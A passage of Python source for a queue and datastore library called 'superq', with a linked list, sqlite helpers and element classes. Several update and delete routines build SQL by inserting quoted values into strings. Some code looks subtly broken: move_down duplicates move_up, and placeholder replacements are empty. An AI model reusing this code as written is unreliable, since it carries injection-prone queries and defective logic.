None\n\n # start from whichever end of list is closest to idx\n midIdx = (self.__count - 1) // 2\n if idx < midIdx:\n item = self.head\n for i in range(0, idx):\n item = item.next\n else:\n item = self.tail\n for i in range(0, (self.__count - 1) - idx):\n item = item.prev\n\n return item\n\n def __slice(self, slice_):\n newLst = LinkedList()\n\n start = slice_.start\n stop = slice_.stop\n step = slice_.step\n\n if step == None:\n step = 1\n\n if start == None:\n if step < 0:\n start = -1\n else:\n start = 0\n elif start < 0:\n start = len(self) + start\n\n if abs(start) > len(self):\n raise IndexError('list index out of range')\n\n if stop == None:\n stop = len(self)\n elif stop < 0:\n stop = len(self) - stop\n\n if abs(stop) > len(self):\n raise IndexError('list index out of range')\n\n node = self.__getitem__(start)\n for i in range(*slice_.indices(len(self))):\n newLst.push_tail(copy(node))\n steps = step\n while steps != 0:\n if steps < 0:\n node = node.prev\n if node is None:\n node = self.tail\n steps += 1\n else:\n node = node.next\n if node is None:\n node = self.head\n steps -= 1\n\n return newLst\n\n def __getitem__(self, val):\n if isinstance(val, slice):\n return self.__slice(val)\n\n return self.__lookup(val)\n\n def is_empty(self):\n return self.__count == 0\n\n def push(self, idx, node):\n if idx == 0:\n # set new head, order of operations matters\n node.prev = None\n node.next = self.head\n\n # if list not empty, point current head to new head\n if self.head is not None:\n self.head.prev = node\n else:\n self.tail = node\n\n self.head = node\n elif idx >= self.__count:\n # set new tail, order of operations matters\n node.next = None\n node.prev = self.tail\n\n # if list not empty, point current tail to new tail\n if self.tail is not None:\n self.tail.next = node\n else:\n self.head = node\n\n self.tail = node\n else:\n curNode = self.__lookup(idx)\n\n # handle empty list case\n if curNode is None:\n self.head = node\n self.tail = node\n node.prev = None\n node.next = None\n else:\n # splice new node in\n node.next = curNode\n node.prev = curNode.prev\n curNode.prev.next = node\n curNode.prev = node\n\n self.__count += 1\n\n def push_head(self, node):\n self.push(0, node)\n\n def push_middle(self, idx, node):\n self.push(idx, node)\n\n def push_tail(self, node):\n self.push(self.__count, node)\n\n def pop(self, idx):\n if self.__count < 1:\n return None\n \n if idx <= 0:\n # get list head\n item = self.head\n\n # point list head to next element\n self.head = self.head.next\n\n # if list not empty, tell head it has no prev \n if self.head is not None:\n self.head.prev = None\n\n # one less element in the list\n self.__count -= 1\n\n # if down to 1 element, set tail to head\n if self.__count == 1:\n self.tail = self.head\n \n return item\n elif idx >= self.__count - 1:\n # get list tail\n item = self.tail\n\n # point list tail to previous element\n self.tail = self.tail.prev\n\n # if list not empty, tell tail it has no next\n if self.tail is not None:\n self.tail.next = None\n\n # one less element in the list\n self.__count -= 1\n\n # if down to 1 element, set head to tail\n if self.__count == 1:\n self.head = self.tail\n\n return item\n else:\n curNode = self.__lookup(idx)\n\n # because curNode is not head or tail, these dereferences are safe\n curNode.prev.next = curNode.next\n curNode.next.prev = curNode.prev\n\n # one less element in the list\n self.__count -= 1\n\n return curNode\n \n def pop_head(self):\n return self.pop(0)\n\n def pop_middle(self, idx):\n return self.pop(idx)\n\n def pop_tail(self):\n return self.pop(self.__count - 1)\n\n def pop_node(self, node):\n if node is None:\n return None\n\n if node.prev is not None:\n node.prev.next = node.next\n else:\n self.head = node.next\n\n if node.next is not None:\n node.next.prev = node.prev\n else:\n self.tail = node.prev\n\n self.__count -= 1\n\n return node\n\n def insert_before(self, oldNode, newNode):\n if self.__count < 1:\n raise SuperQEx('Calling insert_before() on empty list.')\n\n # handle case inserting new head\n if self.head == oldNode:\n newNode.prev = None\n newNode.next = oldNode\n oldNode.prev = newNode\n self.head = newNode\n else:\n newNode.prev = oldNode.prev\n newNode.next = oldNode\n oldNode.prev.next = newNode\n oldNode.prev = newNode\n\n self.__count += 1\n\n def insert_after(self, oldNode, newNode):\n if self.__count < 1:\n raise SuperQEx('Calling insert_before() on empty list.')\n\n # handle case inserting new tail\n if self.tail == oldNode:\n newNode.next = None\n newNode.prev = oldNode\n oldNode.next = newNode\n self.tail = newNode\n else:\n newNode.prev = oldNode\n newNode.next = oldNode.next\n oldNode.next.prev = newNode\n oldNode.next = newNode\n\n self.__count += 1\n\n def move_up(self, node):\n # can't move list node up if it is already head\n if node.prev is None:\n return\n\n # these are aliases to the 4 starting elements involved\n above_node_prev = node.prev.prev\n above_node = node.prev\n current_node = node\n current_node_next = node.next\n\n # do the pointer swaps\n if above_node_prev is not None:\n above_node_prev.next = current_node\n current_node.prev = above_node_prev\n current_node.next = above_node\n above_node.prev = current_node\n above_node.next = current_node_next\n above_node.next.prev = above_node\n\n # if node is at top of list, set head to node\n if current_node.prev is None:\n self.head = current_node\n\n def move_down(self, node):\n # can't move list node up if it is already head\n if node.prev is None:\n return\n\n # these are aliases to the 4 starting elements involved\n above_node_prev = node.prev.prev\n above_node = node.prev\n current_node = node\n current_node_next = node.next\n\n # do the pointer swaps\n if above_node_prev is not None:\n above_node_prev.next = current_node\n current_node.prev = above_node_prev\n current_node.next = above_node\n above_node.prev = current_node\n above_node.next = current_node_next\n above_node.next.prev = above_node\n\n # if node is at top of list, set head to node\n if current_node.prev is None:\n self.head = current_node\n\ndef db_exec(dbConn, sql, values = None):\n errors = 0\n while True:\n try:\n if values:\n dbConn.execute(sql, values)\n else:\n dbConn.execute(sql)\n break\n except OperationalError as e:\n # limit the amount of spinning in case there is a real error\n errors += 1\n if errors > 10:\n raise DBExecError('sql: {0}\\n'\n 'values: {1}\\n'\n 'exception: {2}'.format(sql, values, str(e)))\n\n # when using shared cache mode, sqlite ignores timeouts and\n # handlers; requiring for now this spinning solution.\n # shared cache mode is needed for parallel access of memory db\n sleep(.01)\n except Exception as e:\n raise DBExecError('sql: {0}\\n'\n 'values: {1}\\n'\n 'exception: {2}'.format(sql, values, str(e)))\n\n dbConn.commit()\n\ndef db_select(dbConn, sql, values = None):\n rowLst = []\n dbConn.row_factory = Row\n try:\n if values:\n result = dbConn.execute(sql, values)\n else:\n result = dbConn.execute(sql)\n except Exception as e:\n raise DBExecError('sql: {0}\\n'\n 'values: {1}\\n'\n 'exception: {2}'.format(sql, values, str(e)))\n\n for row in result:\n rowLst.append(row)\n\n return rowLst\n\ndef db_create_table(dbConn, tableName, colStr, values = None):\n db_exec(dbConn,\n 'CREATE TABLE {0} ({1});'.format(tableName, colStr),\n values)\n\ndef db_delete_table(dbConn, tableName, values = None):\n db_exec(dbConn,\n 'DROP TABLE {0};'.format(tableName),\n values)\n\ndef db_create_row(dbConn, tableName, colStr, valStr, values = None):\n db_exec(dbConn,\n 'INSERT INTO {0} ({1}) VALUES ({2});'.format(tableName,\n colStr,\n valStr),\n values)\n\ndef db_update_row(dbConn, tableName, updateStr, key, keyVal, values = None):\n db_exec(dbConn,\n 'UPDATE {0} SET {1} WHERE {2} = {3};'.format(tableName,\n updateStr,\n key,\n keyVal),\n values)\n \ndef db_delete_row(dbConn, tableName, key, keyVal, values = None):\n db_exec(dbConn,\n 'DELETE FROM {0} WHERE {1} = {2};'.format(tableName,\n key,\n keyVal),\n values)\n\n# instantiated for each superq app and for each network node process\nclass SuperQDataStore():\n def __init__(self):\n # networked datastores will set this to True\n self.public = False\n\n self._dataStoreBigLock = Lock()\n\n # keyed by sq.publicName, stores local sqs, caches remote ones\n self.superqdict = {}\n\n self.__networkClient = None\n\n # create detached superq to use for sqlite connection pool\n self.__dbConnPool = superq([])\n\n self.internalConn = self.__new_dbConn()\n\n def __new_dbConn(self):\n return connect('file:memdb1?mode=memory&cache=shared',\n uri = True,\n check_same_thread = False)\n\n def __get_dbConn(self):\n try:\n dbConn = self.__dbConnPool.pop(block = False)\n except SuperQEmpty:\n return self.__new_dbConn()\n else:\n return dbConn\n\n def __return_dbConn(self, s):\n self.__dbConnPool.push(s)\n\n def load_from_file(self):\n raise NotImplemented('SuperQDataStore.load_from_file()')\n \n def save_to_file(self):\n raise NotImplemented('SuperQDataStore.save_to_file()')\n \n def switch_to_disk_based(self):\n raise NotImplemented('SuperQDataStore.switch_to_disk_based()')\n\n def switch_to_in_memory(self):\n raise NotImplemented('SuperQDataStore.switch_to_in_memory()')\n\n def __get_networkClient(self):\n if self.__networkClient is None:\n self.__networkClient = SuperQNetworkClientMgr()\n\n return self.__networkClient\n\n # potentially starts the network datastore process when accessed\n networkClient = property(__get_networkClient)\n\n def shutdown(self):\n if self.__networkClient is not None:\n self.__networkClient.shutdown()\n\n def set_public(self):\n self.public = True\n\n def superq_exists(self, name, host = None, secure = False):\n # private datastore call public\n if host is not None and not self.public:\n publicName = '{0}.{1}'.format(host, name)\n return self.networkClient.superq_exists(publicName, host, secure)\n return name in self.superqdict\n\n def superq_create(self, sq, secure = False):\n # private datastore call public\n if sq.host is not None and not self.public:\n self.networkClient.superq_create(sq, secure)\n\n # add superq to dict after locking the entire collection\n self._dataStoreBigLock.acquire()\n if sq.publicName in self.superqdict:\n raise KeyError('superq {0} exists'.format(sq.publicName))\n else:\n self.superqdict[sq.publicName] = sq\n self._dataStoreBigLock.release()\n \n def superq_read(self, name, host = None, secure = False):\n # private datastore call public\n if host is not None and not self.public:\n publicName = '{0}.{1}'.format(host, name)\n sq = self.networkClient.superq_read(publicName, host, secure)\n\n if publicName not in self.superqdict:\n sq.attached = True\n self.superqdict[publicName] = sq\n else:\n # rebuild existing superq instance using incoming superq\n knownSq = self.superqdict[publicName]\n knownSq.buildFromStr(str(sq))\n\n sq = knownSq\n else:\n # expected to raise KeyError if superq not known\n sq = self.superqdict[name]\n\n return sq\n\n def superq_delete(self, sq, secure = False):\n # delete superq from dict after locking the entire collection\n self._dataStoreBigLock.acquire()\n if sq.publicName in self.superqdict:\n del(self.superqdict[sq.publicName])\n else:\n raise KeyError('superq {0} does not exist'.format(sq.publicName))\n self._dataStoreBigLock.release()\n \n # private datastore call public\n if sq.host is not None and not self.public:\n self.networkClient.superq_delete(sq, secure)\n return\n\n # delete backing table if there are superqelems\n if len(sq) > 0:\n dbConn = self.__get_dbConn()\n db_delete_table(dbConn, sq.name)\n self.__return_dbConn(dbConn)\n\n def superq_query_local(self, queryStr, objSample = None):\n dbConn = self.__get_dbConn()\n rows = db_select(dbConn, queryStr)\n self.__return_dbConn(dbConn)\n\n newSq = superq([])\n\n for row in rows:\n # demarshal single-value objects\n if isinstance(objSample, str):\n newSq.create_elem(str(row['_val_']))\n continue\n elif isinstance(objSample, int):\n newSq.create_elem(int(row['_val_']))\n continue\n elif isinstance(objSample, float):\n newSq.create_elem(float(row['_val_']))\n continue\n elif isinstance(objSample, bytearray):\n newSq.create_elem(bytearray(row['_val_']))\n\n if objSample is None:\n newObj = superqelem(parentSq = newSq)\n else:\n newObj = copy(objSample)\n\n # demarshal multi-value objects\n for col in row.keys():\n # extract field name from col name\n colElems = col.split('.')\n fieldName = colElems[len(colElems) - 1]\n\n if isinstance(newObj, superqelem):\n newObj.add_atom(fieldName, 'str', row[fieldName])\n continue\n\n objVal = getattr(newObj, fieldName)\n if isinstance(objVal, str):\n val = str(row[fieldName])\n elif isinstance(objVal, int):\n val = int(row[fieldName])\n elif isinstance(objVal, float):\n val = float(row[fieldName])\n elif isinstance(objVal, bytearray):\n # bytearrays must be uncompressed\n val = rledecode_hqx(bytearray(row[fieldName]))\n else:\n valType = type(objVal)\n raise TypeError('unsupported type ({0})'.format(valType))\n\n setattr(newObj, fieldName, val)\n\n newSq.create_elem(newObj)\n\n # clear objSample from being set by first create_elem\n newSq.objSample = None\n\n return newSq\n \n def superq_query(self,\n sq,\n columns,\n tables,\n conditional,\n objSample = None,\n secure = False):\n # create column string and list from input\n if isinstance(columns, list):\n colStr = ','.join(columns)\n colLst = columns\n elif isinstance(columns, str):\n colStr = columns\n colLst = columns.split(',')\n else:\n raise TypeError('invalid type ({0})'.format(type(columns)))\n\n # create table string and list from input\n if isinstance(tables, list):\n tableStr = ','.join(tables)\n tableLst = tables\n elif isinstance(tables, str):\n tableStr = tables\n tableLst = tables.split(',')\n else:\n raise TypeError('invalid type ({0})'.format(type(tables)))\n\n if '' not in tableStr:\n raise ValueError('join tables ({0}) not valid.'.format(tableStr))\n\n # do some pre-processing and construct query\n colStr = colStr.replace('', sq.name)\n tableStr = tableStr.replace('', sq.name)\n conditional = conditional.replace('', sq.name)\n queryStr = 'SELECT {0} FROM {1} WHERE {2};'.format(colStr,\n tableStr,\n conditional)\n\n # execute query locally if superq is not public or the datastore is\n if sq.host is None or self.public:\n return self.superq_query_local(queryStr, objSample)\n\n resultSq = self.networkClient.superq_query(sq, queryStr, secure)\n\n if objSample is None:\n return resultSq\n\n newSq = superq([])\n\n # if there is a sample object available, demarshal accordingly\n for sqe in resultSq:\n # demarshal single-value objects\n if isinstance(objSample, str):\n newSq.create_elem(str(sqe['_val_']))\n continue\n elif isinstance(objSample, int):\n newSq.create_elem(int(sqe['_val_']))\n continue\n elif isinstance(objSample, float):\n newSq.create_elem(float(sqe['_val_']))\n continue\n elif isinstance(objSample, bytearray):\n newSq.create_elem(bytearray(sqe['_val_']))\n continue\n\n newObj = copy(objSample)\n\n # demarshal multi-value objects\n for atom in sqe:\n col = atom.name\n\n # extract field name from col name\n colElems = col.split('.')\n fieldName = colElems[len(colElems) - 1]\n\n objVal = getattr(newObj, fieldName)\n if isinstance(objVal, str):\n val = str(atom.value)\n elif isinstance(objVal, int):\n val = int(atom.value)\n elif isinstance(objVal, float):\n val = float(atom.value)\n elif isinstance(objVal, bytearray):\n val = bytearray(atom.value)\n else:\n valType = type(objVal)\n raise TypeError('unsupported type ({0})'.format(valType))\n\n setattr(newObj, fieldName, val)\n\n newSq.create_elem(newObj)\n\n return newSq\n\n def superqelem_exists(self, sq, sqeName):\n return sqeName in self.superqdict[sq.publicName][sqeName]\n\n def superqelem_create(self,\n sq,\n sqe,\n idx = None,\n createTable = False,\n secure = False):\n # private datastore call public\n if sq.host is not None and not self.public:\n self.networkClient.superqelem_create(sq, sqe, idx, secure)\n return\n\n # the backing db table is only created when the 1st element is added\n if createTable:\n dbConn = self.__get_dbConn()\n db_create_table(dbConn, sq.name, sq.nameTypeStr)\n self.__return_dbConn(dbConn)\n\n valStr = ''\n values = []\n if sqe.value is not None:\n valStr += '?,?,?'\n values.append(sqe.name)\n values.append(sqe.value)\n values.append(sqe.links)\n else:\n atomDict = sqe.dict()\n for colName in sq.colNames:\n # support standard columns\n if colName == '_name_':\n valStr += '?,'\n values.append(sqe.name)\n continue\n elif colName == '_links_':\n valStr += '?,'\n values.append(sqe.links)\n continue;\n\n atom = atomDict[colName]\n\n values.append(atom.value)\n valStr += '?,'\n valStr = valStr.rstrip(',')\n\n dbConn = self.__get_dbConn()\n db_create_row(dbConn, sq.name, sq.nameStr, valStr, tuple(values))\n self.__return_dbConn(dbConn)\n\n def __superqelem_update_db(self, sq, sqe):\n # support autoKey\n keyCol = sq.keyCol\n if keyCol is None:\n keyCol = '_name_'\n\n # handle scalars\n if sqe.value is not None:\n val = sqe.value\n if sqe.valueType.startswith('str'):\n val = \"'{0}'\".format(val)\n \n updateStr = '{0}={1}'.format('_val_', val)\n else:\n updateStr = ''\n\n for i in range(0, len(sq.colNames)):\n name = sq.colNames[i]\n\n # no need to update key column\n if name == keyCol or name == '_name_':\n continue\n elif name == '_links_':\n # deal with links column after all the rest\n continue\n\n val = sqe[sq.colNames[i]]\n if sq.colTypes[i].startswith('str'):\n val = \"'{0}'\".format(val)\n\n updateStr += '{0}={1},'.format(name, val)\n updateStr = updateStr.rstrip(',')\n\n # special-case _links_ column\n updateStr += \",{0}='{1}'\".format('_links_', sqe.links)\n\n # quote sqe name if it's a string\n sqeName = sqe.name\n if isinstance(sqeName, str):\n sqeName = \"'{0}'\".format(sqeName)\n\n dbConn = self.__get_dbConn()\n db_update_row(dbConn, sq.name, updateStr, keyCol, sqeName)\n self.__return_dbConn(dbConn)\n\n def superqelem_read(self, sq, sqeName, secure = False):\n # private datastore call public\n if sq.host is not None and not self.public:\n sqe = self.networkClient.superqelem_read(sq.name, sqeName, secure)\n\n if superqelemExists(sq, sqeName):\n self.__superqelem_update_db(sq, sqe)\n else:\n raise ObjectNotRecognized('sqe \\'' + sqeName + '\\' not known.')\n\n self.superqdict[sq.publicName][sqeName] = sqe\n return sqe\n\n # raises KeyValue error if superqelem not known\n return self.superqdict[sq.publicName][sqeName]\n\n def superqelem_update(self, sq, sqe, secure = False):\n # private datastore call public\n if sq.host is not None and not self.public:\n sqe = self.networkClient.superqelem_update(sq, sqe, secure)\n return\n\n self.__superqelem_update_db(sq, sqe)\n\n def superqelem_delete(self, sq, sqeName, secure = False):\n # private datastore call public \n if sq.host is not None and not self.public:\n self.networkClient.superqelem_delete(sq, sqeName, secure)\n return\n\n # wrap with quotes if sqe key is str\n if isinstance(sqeName, str):\n sqeName = \"'{0}'\".format(sqeName)\n\n # support autoKey\n keyCol = sq.keyCol\n if keyCol is None:\n keyCol = '_name_'\n\n dbConn = self.__get_dbConn()\n db_delete_row(dbConn, sq.name, keyCol, sqeName)\n self.__return_dbConn(dbConn)\n\nclass elematom(LinkedListNode):\n def __init__(self, name, type_, value):\n LinkedListNode.__init__(self)\n\n self.name = name\n self.type = type_\n self.value = value\n\nclass superqelem(LinkedListNode):\n def __init__(self,\n name = None,\n value = None,\n parentSq = None,\n buildFromStr = False):\n LinkedListNode.__init__(self)\n\n # list of elematoms\n self.__internalList = LinkedList()\n\n # dictionary of elematoms, keyed by 'field' name\n self.__internalDict = {}\n\n # any sqe can link to any number of other sqes\n self.links = ''\n self.linksDict = {}\n\n if name is None:\n name = str(uuid4().hex)\n\n self.name = name\n self.value = value\n\n if self.value is None:\n self.value = name\n\n self.parentSq = parentSq\n\n # used to remember user object for local instance\n self.obj = None\n\n # construct publicName property and add it to the class\n getter = lambda self: self.__get_publicName()\n setattr(self.__class__,\n 'publicName',\n property(fget = getter, fset = None))\n\n if buildFromStr:\n self.__buildFromStr(self.value)\n return\n\n if not isinstance(self.name, (str, int, float)):\n raise TypeError('invalid name type ({0})'.format(type(self.name)))\n\n # handle scalars\n self.valueType = ''\n if isinstance(value, (str, int, float)):\n self.valueType = type(self.value).__name__\n return\n elif isinstance(value, bytearray):\n # compress bytearray\n self.value = rlecode_hqx(value)\n\n self.valueType = type(self.value).__name__\n return\n\n # only scalars keep value set\n self.value = None\n\n # non-scalars should 'remember' the user object they're created from\n self.obj = value\n\n # handle non-scalars\n self.obj = value\n for attrName in dir(value):\n attr = getattr(value, attrName)\n\n # skip private attributes and callables\n if attrName.startswith('_') or callable(attr):\n continue\n\n # ignore any attributes whose types aren't supported\n if not isinstance(attr, (str, int, float, bytearray)):\n continue\n\n # add object field as superqelem property\n if isinstance(attr, bytearray):\n self.add_property_ba(attrName)\n\n # compress bytearray\n attr = rlecode_hqx(attr)\n else:\n self.add_property(attrName)\n\n self.add_atom(attrName, type(attr).__name__, attr)\n\n # called for all attribute assignments\n def __setattr__(self, attr, value):\n # handle the setting of links to other sqes\n if (isinstance(value, superqelem) and\n attr != 'prev' and attr != 'next'): # clumsy LinkedList avoidance\n # update link if it exists already\n if attr in self.linksDict:\n oldValue = self.linksDict[attr]\n newValue = value.publicName\n self.links = self.links.replace('{0}^{1}'.format(attr,\n oldValue),\n '{0}^{1}'.format(attr,\n newValue))\n else:\n self.links += '{0}^{1}/'.format(attr, value.publicName)\n\n # now set the dictionary value\n self.linksDict[attr] = value.publicName\n\n # trigger update\n if self.parentSq is not None:\n self.parentSq.update_elem_datastore_only(self)\n else:\n # compress bytearray\n if isinstance(value, bytearray):\n value = rlecode_hqx(value)\n\n # call default setattr behavior\n object.__setattr__(self, attr, value)\n\n # called only when a non-existant attribute is accessed\n def __getattr__(self, attr):\n if attr in self.linksDict:\n # lookup and return linked sqe\n sqName, sqeName = self.linksDict[attr].rsplit('.', 1)\n return superq(sqName)[sqeName]\n\n raise AttributeError\n\n def __get_publicName(self):\n if self.parentSq is None:\n return self.name\n return '{0}.{1}'.format(self.parentSq.publicName, self.name)\n\n def set_scalar(self, value):\n # scalar superqelems don't have properties\n if self.value is None:\n return\n\n if isinstance(self.value, str):\n value = str(value)\n elif isinstance(self.value, int):\n value = int(value)\n elif isinstance(self.value, float):\n value = float(value)\n elif isinstance(self.value, bytearray):\n # compress bytearray\n value = rlecode_hqx(bytearray(value))\n\n self.value = value\n\n # trigger update\n if self.parentSq is not None:\n self.parentSq.update_elem(self)\n\n def add_property(self, attr):\n # create local setter and getter with a particular attribute name\n getter = lambda self: self.__get_property(attr)\n setter = lambda self, value: self.__set_property(attr, value)\n\n # construct property attribute and add it to the class\n setattr(self.__class__, attr, property(fget = getter, fset = setter))\n\n def add_property_ba(self, attr):\n # create local setter and getter with a particular attribute name\n getter = lambda self: self.__get_property_ba(attr)\n setter = lambda self, value: self.__set_property_ba(attr, value)\n\n # construct property attribute and add it to the class\n setattr(self.__class__, attr, property(fget = getter, fset = setter))\n\n # dynamic property getter\n def __get_property(self, attr):\n if attr in self.__internalDict:\n return self.__internalDict[attr].value\n else:\n raise SuperQEx('unrecognized attribute: {0}'.format(attr))\n\n # dynamic property setter\n def __set_property(self, attr, value):\n # remember attribute\n self.__internalDict[attr].value = value\n\n # maintain state if there is an original user object\n if self.obj is not None:\n setattr(self.obj, attr, value)\n\n # trigger update\n if self.parentSq is not None:\n self.parentSq.update_elem_datastore_only(self)\n\n # dynamic property getter for bytearrays\n def __get_property_ba(self, attr):\n if attr in self.__internalDict:\n # uncompress and return data\n return rledecode_hqx(self.__internalDict[attr].value)\n else:\n raise SuperQEx('unrecognized attribute: {0}'.format(attr))\n\n # dynamic property setter for bytearrays\n def __set_property_ba(self, attr, value):\n # compress and store data\n self.__internalDict[attr].value = rlecode_hqx(value)\n\n # maintain state if there is an original user object\n if self.obj is not None:\n setattr(self.obj, attr, value)\n\n # trigger update\n if self.parentSq is not None:\n self.parentSq.update_elem_datastore_only(self)\n\n def resetLinks(self):\n self.linksDict = {}\n self.links = ''\n\n def addLinksFromStr(self, linksStr):\n linkElems = linksStr.split('/')\n for link in linkElems:\n if not link:\n break\n\n # add link\n key, value = link.split('^')\n self.links += '{0}/'.format(link)\n self.linksDict[key] = value\n\n def __buildFromStr(self, sqeStr):\n headerSeparatorIdx = sqeStr.index(';')\n\n # separate out sqe header from remainder\n sqeHeader = sqeStr[ : headerSeparatorIdx]\n sqeBody = sqeStr[headerSeparatorIdx + 1 : ]\n\n # parse out header fields\n headerElems = sqeHeader.split(',', 5)\n\n # name-type and name-value\n nameType = headerElems[0]\n if nameType.startswith('str'):\n self.name = str(headerElems[1])\n elif nameType.startswith('int'):\n self.name = int(headerElems[1])\n elif nameType.startswith('float'):\n self.name = float(headerElems[1])\n\n # value-type and actual value\n self.valueType = headerElems[2]\n if self.valueType.startswith('str'):\n self.value = str(headerElems[3])\n elif self.valueType.startswith('int'):\n self.value = int(headerElems[3])\n elif self.valueType.startswith('float'):\n self.value = float(headerElems[3])\n elif self.valueType.startswith('byte'):\n # ignore str frame \"b'...'\"\n byteStr = headerElems[3][2 : -1]\n\n self.value = unhexlify(byteStr)\n\n # add links individually\n self.addLinksFromStr(headerElems[4])\n\n # scalar superqelems\n if self.valueType != '':\n return\n\n # only scalar superqelems should use value\n self.value = None\n\n # number of fields or atoms\n numFields = int(headerElems[5])\n\n # parse out each field\n for i in range(0, numFields):\n # separate field length indicator from remainder\n separatorIdx = sqeBody.index('|')\n fieldLen = int(sqeBody[ : separatorIdx])\n sqeBody = sqeBody[separatorIdx + 1 : ]\n\n # slice the rest of the field out\n field = sqeBody[ : fieldLen - 1]\n sqeBody = sqeBody[fieldLen : ]\n\n # slice field name from field\n separatorIdx = field.index('|')\n fieldName = field[ : separatorIdx]\n field = field[separatorIdx + 1 : ]\n\n # now retrieve type and value\n separatorIdx = field.index('|')\n fieldType = field[ : separatorIdx]\n\n fieldValue = field[separatorIdx + 1 : ]\n if fieldType.startswith('int'):\n fieldValue = int(fieldValue)\n elif fieldType.startswith('float'):\n fieldValue = float(fieldValue)\n elif fieldType.startswith('byte'):\n # ignore str frame \"b'...'\"\n byteStr = fieldValue[2 : -1]\n\n fieldValue = unhexlify(byteStr)\n\n self.add_atom(fieldName, fieldType, fieldValue)\n\n def __iter__(self):\n self.iterNext = self.__internalList.head\n\n return self\n\n def __next__(self):\n returnObj = self.iterNext\n\n if returnObj:\n self.iterNext = self.iterNext.next\n else:\n raise StopIteration\n\n return returnObj\n\n def __getitem__(self, key):\n if key in self.__internalDict:\n atom = self.__internalDict[key]\n elif isinstance(key, int) and key < len(self.__internalDict):\n # if atom isn't keyed on the int, try the int as an index\n atom = self.__internalList[key]\n else:\n raise KeyError(key)\n\n if atom.type.startswith('byte'):\n # decompress and return data\n return rledecode_hqx(atom.value)\n else:\n return atom.value\n\n def __setitem__(self, key, value):\n if key in self.__internalDict:\n atom = self.__internalDict[key]\n elif isinstance(key, int) and key < len(self.__internalDict):\n # if atom isn't keyed on the int, try the int as an index\n atom = self.__internalList[key]\n else:\n raise KeyError(key)\n\n if atom.type.startswith('byte'):\n # compress and store data\n atom.value = rlecode_hqx(value)\n else:\n atom.value = value\n\n def __str__(self):\n sqeStr = '{0},{1},{2},{3},{4},{5};'.format(type(self.name).__name__,\n self.name,\n self.valueType,\n self.value,\n self.links,\n len(self.__internalList))\n for atom in self:\n if atom.type.startswith('byte'):\n # convert bytearray to string\n value = hexlify(atom.value)\n else:\n value = atom.value\n elemStr = '{0}|{1}|{2};'.format(atom.name, atom.type, value)\n\n sqeStr += '{0}|{1}'.format(len(elemStr), elemStr)\n \n return sqeStr\n\n def __basecopy(self):\n # initialize new sqe\n sqe = superqelem(self.name, self.value, self.parentSq)\n\n # remember user obj\n sqe.obj = self.obj\n\n # add links individually\n sqe.addLinksFromStr(self.links)\n\n # add atoms\n for atom in self:\n sqe.add_atom(atom.name, atom.type, atom.value)\n\n return sqe\n\n def __copy__(self):\n return self.__basecopy()\n\n def __deepcopy__(self):\n return self.__basecopy()\n\n # return internal list\n def _list(self):\n return self.__internalList\n\n # return internal list as python list\n def list(self):\n return [val for val in self]\n\n def dict(self):\n return self.__internalDict\n\n def add_atom(self, name, type_, value):\n atom = elematom(name, type_, value)\n\n self.__internalDict[name] = atom\n self.__internalList.push_tail(atom)\n\n def __key_user_obj(self, obj):\n # if possible, make user object relatable back to superqelem\n try:\n setattr(obj, '_superqelemKey', self.name)\n except Exception:\n # one reason for arriving here might be obj is a __slots__ object\n pass\n return obj \n\n def demarshal(self, objSample = None):\n # return original user object if it is known\n if self.obj is not None:\n return self.__key_user_obj(self.obj)\n\n # return superqelem if nothing provided to demarshal into\n if objSample is None:\n return self\n\n # demarshal single-value objects\n if isinstance(objSample, str):\n return str(self['_val_'])\n elif isinstance(objSample, int):\n return int(self['_val_'])\n elif isinstance(objSample, float):\n return float(self['_val_'])\n elif isinstance(objSample, bytearray):\n # uncompress and return data\n return rledecode_hqx(bytearray(self['_val_']))\n\n # demarshal multi-value objects\n newObj = copy(objSample)\n for name, atom in self.__internalDict.items():\n objVal = getattr(newObj, atom.name)\n if isinstance(objVal, str):\n val = str(atom.value)\n elif isinstance(objVal, int):\n val = int(atom.value)\n elif isinstance(objVal, float):\n val = float(atom.value)\n elif isinstance(objVal, bytearray):\n # uncompress data\n val = rledecode_hqx(bytearray(atom.value))\n else:\n raise TypeError('unsupported type ({0})'.format(colType))\n\n setattr(newObj, atom.name, val)\n\n return self.__key_user_obj(newObj)\n\nclass superq():\n # overriding __new__ in order to be able to return existing objects\n def __new__(cls,\n initObj,\n name = None,\n host = None,\n attach = False,\n keyCol = None,\n maxlen = None,\n buildFromStr = False,\n buildFromFile = False,\n secure = False):\n # str initObj can contain string and file deserialization info\n if not buildFromStr and not buildFromFile:\n if isinstance(initObj, str):\n # return datastore superq if it exists\n if _dataStore.superq_exists(initObj, host, secure):\n return _dataStore.superq_read(initObj, host)\n else:\n raise KeyError('superq {0} does not exist'.format(initObj))\n\n return object.__new__(cls)\n\n def __init__(self,\n initObj,\n name = None,\n host = None,\n attach = False,\n keyCol = None,\n maxlen = None,\n buildFromStr = False,\n buildFromFile = False,\n secure = False):\n # get DataStore handle\n self.dataStore = _dataStore\n\n # skip initialization if __init__ is being called on an existing object\n if hasattr(self, 'initialized'):\n return\n\n # mutex must be held whenever the queue is mutating. All methods\n # that acquire mutex must release it before returning. mutex is\n # shared between the conditions, so acquiring and releasing the\n # conditions also acquires and releases mutex\n self.mutex = RLock()\n\n # notify not_empty whenever an item is added to the queue; a\n # thread waiting to get is notified then\n self.not_empty = Condition(self.mutex)\n\n # notify not_full whenever an item is removed from the queue;\n # a thread waiting to put is notified then\n self.not_full = Condition(self.mutex)\n\n self.name = name\n\n # if no name provided, one will be assigned\n if self.name is None:\n self.name = 'sq' + str(uuid4().hex)\n\n # indicates whether superq is currently backed in the datastore\n self.attached = False\n\n # attached superqs with no host use the private local-process datastore\n self.host = host\n\n # indicates object field to be used as sqe key\n self.keyCol = keyCol\n\n # if maxlen is None, superq may grow unbounded\n self.maxlen = maxlen\n\n # object type is established when the 1st element is added or when\n # superq user manually specifies. This is the type superqelems will\n # be demarshalled into when requested. Or, if None, superqelems will\n # be directly returned (or they can be requested through self.n())\n self.objSample = None\n\n # these describe the superq backing schema and are populated after\n # using introspection on the 1st element added\n self.colNames = []\n self.colTypes = []\n self.nameStr = '' # comma-delimited list, usable in INSERTs\n self.nameTypeStr = '' # names and types, usable in CREATEs\n\n # indicates backing db table should be created next attached add elem\n self.createTable = False\n\n # superqelems are arrayed like a list but mapped like a dictionary\n self.__internalList = LinkedList()\n self.__internalDict = {}\n\n # automatically generates key column\n self.autoKey = False\n if self.keyCol is None:\n self.autoKey = True\n\n # set for secure network connections\n self.secure = secure\n\n # construct publicName property and add it to the class\n getter = lambda self: self.__get_publicName()\n setattr(self.__class__,\n 'publicName',\n property(fget = getter, fset = None))\n\n # deserializes from string or 